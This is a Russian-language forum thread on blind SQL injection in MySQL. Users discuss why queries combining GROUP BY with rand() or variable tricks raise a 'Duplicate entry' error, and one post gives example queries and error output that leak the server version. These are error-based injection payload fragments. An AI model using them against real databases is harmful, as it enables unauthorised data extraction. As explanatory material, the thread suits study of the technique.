Старый 25.06.2011, 18:38   #31
Pr0xor
 
Регистрация: 27.08.2010
Сообщений: 158
Репутация: 69
По умолчанию

Цитата:
Сообщение от p(eaZ Посмотреть сообщение
Первая сыль не доступна, не зареганным пользователям, на эксплоит ин, и регаться там ради нее не вижу смысла....
Просьба выкладывайте обще доступные полезные ссылки...
Вторая уже была выше.....
Pr0xor вне форума   Ответить с цитированием
Старый 25.07.2011, 00:27   #32
Unreal
 
Регистрация: 23.01.2011
Сообщений: 1
Репутация: 0
По умолчанию

Qwazar, объясни пожалуйста поподробней логику работы этого запроса:
Цитата:
select count(*),concat(version(),floor(rand(0)*2)) x from table group by x;
что-то никак не дойдёт до меня...
Unreal вне форума   Ответить с цитированием
Старый 28.03.2014, 08:37   #33
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от Unreal Посмотреть сообщение
Код:
select count(*),concat(version(),floor(rand(0)*2)) x from table group by x;
что-то никак не дойдёт до меня...
Все очень просто. Для получения ошибки необходимо выполнить 4 фактора:
  • Использовать агрегатную функцию для группировки записей
  • Передать информацию для вывода в GROUP BY
  • Таблица должна иметь как минимум 3 записи
  • Выражение, попадающие в GROUP BY, при исполнении с теми же данными второй раз должно дать другой результат(в одном из случаев)
Примеры:
Код:
mysql> SELECT 1 FROM mysql.user WHERE 1 or 1 group by mid(version() from rand(0) for 9e9) having min(0);
ERROR 1062 (23000): Duplicate entry '5.5' for key 'group_key'

mysql> SELECT @:=1 UNION SELECT CASE WHEN @:=!@ THEN 'abcd' ELSE 3 END x from mysql.user group by x having count(*);
ERROR 1062 (23000): Duplicate entry 'abcd' for key 'group_key'
Из-за первого критерия использование хотя бы одной пары скобок обязательно.

Обращусь ко всем, есть MySQL Bug #59952: http://bugs.mysql.com/bug.php?id=59952
Код:
select distinct g.id_galery_obfuscated, t.term from galery_1 g join tezaver t on g.id_tezaver = t.id_tezaver
SQL Error (1062): Duplicate entry 'abcd' for key 'distinct_key'
Скобок в запросе нет, ошибка - есть. Повторить баг не получилось.

Последний раз редактировалось NameSpace; 28.03.2014 в 10:01..
NameSpace вне форума   Ответить с цитированием
Ответ

Метки
blind sql injection, injection, mysql

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot